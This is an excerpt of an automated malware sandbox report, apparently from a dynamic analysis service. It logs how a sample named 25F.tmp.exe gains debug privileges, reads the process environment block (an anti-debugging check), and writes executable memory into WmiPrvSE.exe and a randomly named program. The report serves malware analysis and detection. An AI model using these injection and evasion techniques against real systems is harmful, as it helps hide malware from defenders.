            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 17_2_001035B0 mov eax, dword ptr fs:[00000030h]  17_2_001035B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 18_2_001035B0 mov eax, dword ptr fs:[00000030h]  18_2_001035B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 19_2_002235B0 mov eax, dword ptr fs:[00000030h]  19_2_002235B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 20_2_003235B0 mov eax, dword ptr fs:[00000030h]  20_2_003235B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 21_2_005135B0 mov eax, dword ptr fs:[00000030h]  21_2_005135B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 22_2_001935B0 mov eax, dword ptr fs:[00000030h]  22_2_001935B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 23_2_008435B0 mov eax, dword ptr fs:[00000030h]  23_2_008435B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 25_2_004035B0 mov eax, dword ptr fs:[00000030h]  25_2_004035B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 26_2_008235B0 mov eax, dword ptr fs:[00000030h]  26_2_008235B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 27_2_000935B0 mov eax, dword ptr fs:[00000030h]  27_2_000935B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 29_2_005D35B0 mov eax, dword ptr fs:[00000030h]  29_2_005D35B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 30_2_000935B0 mov eax, dword ptr fs:[00000030h]  30_2_000935B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 31_2_009135B0 mov eax, dword ptr fs:[00000030h]  31_2_009135B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 32_2_003935B0 mov eax, dword ptr fs:[00000030h]  32_2_003935B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 33_2_000935B0 mov eax, dword ptr fs:[00000030h]  33_2_000935B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 34_2_002235B0 mov eax, dword ptr fs:[00000030h]  34_2_002235B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 35_2_001535B0 mov eax, dword ptr fs:[00000030h]  35_2_001535B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 36_2_007F35B0 mov eax, dword ptr fs:[00000030h]  36_2_007F35B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 37_2_002535B0 mov eax, dword ptr fs:[00000030h]  37_2_002535B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 38_2_002635B0 mov eax, dword ptr fs:[00000030h]  38_2_002635B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 39_2_003F35B0 mov eax, dword ptr fs:[00000030h]  39_2_003F35B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 40_2_003F35B0 mov eax, dword ptr fs:[00000030h]  40_2_003F35B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 41_2_002835B0 mov eax, dword ptr fs:[00000030h]  41_2_002835B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 42_2_001035B0 mov eax, dword ptr fs:[00000030h]  42_2_001035B0
            Source: C:\Users\user\Desktop\25F.tmp.exe  Code function: 4_2_00363830 GetProcessHeap,HeapReAlloc,  4_2_00363830
            Source: C:\Users\user\Desktop\25F.tmp.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Process token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 1B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: C50000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3D0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 410000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 350000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 310000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 210000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 220000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 320000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 510000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 840000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 820000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5D0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 910000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 390000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 220000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 150000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe  Memory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 7F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 260000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 280000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
